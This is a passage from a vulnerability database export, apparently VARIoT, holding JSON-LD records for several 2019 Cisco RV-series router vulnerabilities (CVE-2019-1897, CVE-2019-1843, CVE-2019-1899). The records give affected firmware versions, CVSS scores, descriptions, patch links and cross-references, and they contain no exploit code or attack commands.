            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rvrouters-dos"
          },
          {
            "trust": 0.6,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-fileaccess"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18900"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151369"
          },
          {
            "db": "BID",
            "id": "108848"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005706"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-794"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1897"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18900"
          },
          {
            "db": "VULHUB",
            "id": "VHN-151369"
          },
          {
            "db": "BID",
            "id": "108848"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005706"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-794"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1897"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-06-24T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-18900"
          },
          {
            "date": "2019-06-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-151369"
          },
          {
            "date": "2019-06-19T00:00:00",
            "db": "BID",
            "id": "108848"
          },
          {
            "date": "2019-06-26T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005706"
          },
          {
            "date": "2019-06-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-794"
          },
          {
            "date": "2019-06-20T03:15:12.353000",
            "db": "NVD",
            "id": "CVE-2019-1897"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-06-24T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-18900"
          },
          {
            "date": "2020-10-16T00:00:00",
            "db": "VULHUB",
            "id": "VHN-151369"
          },
          {
            "date": "2019-06-19T00:00:00",
            "db": "BID",
            "id": "108848"
          },
          {
            "date": "2019-06-26T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005706"
          },
          {
            "date": "2020-10-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-794"
          },
          {
            "date": "2024-11-21T04:37:38.470000",
            "db": "NVD",
            "id": "CVE-2019-1897"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-794"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Cisco Vulnerabilities related to authorization in routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005706"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "access control error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-794"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201906-0682

    Vulnerability from variot - Updated: 2024-11-23 22:06

    A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to cause a reload of an affected device, resulting in a denial of service (DoS) condition. This vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to reload the device and causing a DoS condition. The RV215W is a Wireless-N VPN router from Cisco. A denial of service vulnerability exists in the Web-based management interface of Cisco RV110W versions prior to 1.2.2.4, versions prior to RV130W 1.0.3.51, and versions prior to RV215W 1.3.1.4. Cisco RV110W, RV130W, and RV215W Routers are prone to a denial-of-service vulnerability. This issue is being tracked by Cisco Bug IDs CSCvo21850, CSCvo39082 and CSCvo39087

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201906-0682",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv110w",
            "scope": "lt",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "1.2.2.4"
          },
          {
            "model": "rv130w",
            "scope": "lt",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "1.0.3.51"
          },
          {
            "model": "rv215w",
            "scope": "lt",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "1.3.1.4"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w wireless-n multifunction vpn routerr",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.3.1.1"
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0.3.45"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.2.2.1"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.3.1.4"
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0.3.51"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.2.2.4"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18734"
          },
          {
            "db": "BID",
            "id": "108864"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005776"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1843"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005776"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "T. Shiomitsu of Pen Test Partners LLP.",
        "sources": [
          {
            "db": "BID",
            "id": "108864"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-799"
          }
        ],
        "trust": 0.9
      },
      "cve": "CVE-2019-1843",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2019-1843",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-18734",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "VHN-150775",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.9,
                "id": "CVE-2019-1843",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 8.6,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.9,
                "id": "CVE-2019-1843",
                "impactScore": 4.0,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2019-1843",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2019-1843",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2019-1843",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-18734",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201906-799",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-150775",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18734"
          },
          {
            "db": "VULHUB",
            "id": "VHN-150775"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005776"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-799"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1843"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1843"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to cause a reload of an affected device, resulting in a denial of service (DoS) condition. This vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to reload the device and causing a DoS condition. The RV215W is a Wireless-N VPN router from Cisco. A denial of service vulnerability exists in the Web-based management interface of Cisco RV110W versions prior to 1.2.2.4, versions prior to RV130W 1.0.3.51, and versions prior to RV215W 1.3.1.4. Cisco RV110W, RV130W, and RV215W Routers are prone to a denial-of-service vulnerability. \nThis issue is being tracked by Cisco Bug IDs CSCvo21850, CSCvo39082 and CSCvo39087",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-1843"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005776"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-18734"
          },
          {
            "db": "BID",
            "id": "108864"
          },
          {
            "db": "VULHUB",
            "id": "VHN-150775"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-1843",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "108864",
            "trust": 2.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005776",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-799",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-18734",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2019.2190",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-150775",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18734"
          },
          {
            "db": "VULHUB",
            "id": "VHN-150775"
          },
          {
            "db": "BID",
            "id": "108864"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005776"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-799"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1843"
          }
        ]
      },
      "id": "VAR-201906-0682",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18734"
          },
          {
            "db": "VULHUB",
            "id": "VHN-150775"
          }
        ],
        "trust": 1.2914166040000001
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18734"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:06:10.306000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-20190619-rvrouters-dos",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rvrouters-dos"
          },
          {
            "title": "Cisco RV110W, RV130W, RV215W Management Interface Denial of Service Vulnerability Patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/164085"
          },
          {
            "title": "Multiple Cisco Product input verification error vulnerability fixes",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93949"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18734"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005776"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-799"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-20",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-150775"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005776"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1843"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rvrouters-dos"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/108864"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1843"
          },
          {
            "trust": 0.9,
            "url": "http://www.cisco.com/"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-1843"
          },
          {
            "trust": 0.6,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-dos"
          },
          {
            "trust": 0.6,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-infodis"
          },
          {
            "trust": 0.6,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190619-rv-fileaccess"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2019.2190/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18734"
          },
          {
            "db": "VULHUB",
            "id": "VHN-150775"
          },
          {
            "db": "BID",
            "id": "108864"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005776"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-799"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1843"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-18734"
          },
          {
            "db": "VULHUB",
            "id": "VHN-150775"
          },
          {
            "db": "BID",
            "id": "108864"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005776"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-799"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1843"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-06-20T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-18734"
          },
          {
            "date": "2019-06-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-150775"
          },
          {
            "date": "2019-06-19T00:00:00",
            "db": "BID",
            "id": "108864"
          },
          {
            "date": "2019-06-28T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005776"
          },
          {
            "date": "2019-06-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-799"
          },
          {
            "date": "2019-06-20T03:15:11.853000",
            "db": "NVD",
            "id": "CVE-2019-1843"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-06-20T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-18734"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-150775"
          },
          {
            "date": "2019-06-19T00:00:00",
            "db": "BID",
            "id": "108864"
          },
          {
            "date": "2019-06-28T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005776"
          },
          {
            "date": "2019-06-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-799"
          },
          {
            "date": "2024-11-21T04:37:30.880000",
            "db": "NVD",
            "id": "CVE-2019-1843"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-799"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Cisco Product Input validation vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005776"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Input Validation Error",
        "sources": [
          {
            "db": "BID",
            "id": "108864"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-799"
          }
        ],
        "trust": 0.9
      }
    }

    VAR-201906-0690

    Vulnerability from variot - Updated: 2024-11-23 22:06

    A vulnerability in the web interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to acquire the list of devices that are connected to the guest network. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing a specific URI on the web interface of the router. The Cisco RV110W and so on are all VPN firewall routers from Cisco. An attacker can exploit this issue to obtain sensitive information. This may lead to other attacks. This issue is being tracked by the Cisco Bug IDs CSCvo65058, CSCvo65061 and CSCvo65062

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201906-0690",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w wireless-n multifunction vpn routerr",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-25712"
          },
          {
            "db": "BID",
            "id": "108867"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005708"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1899"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005708"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
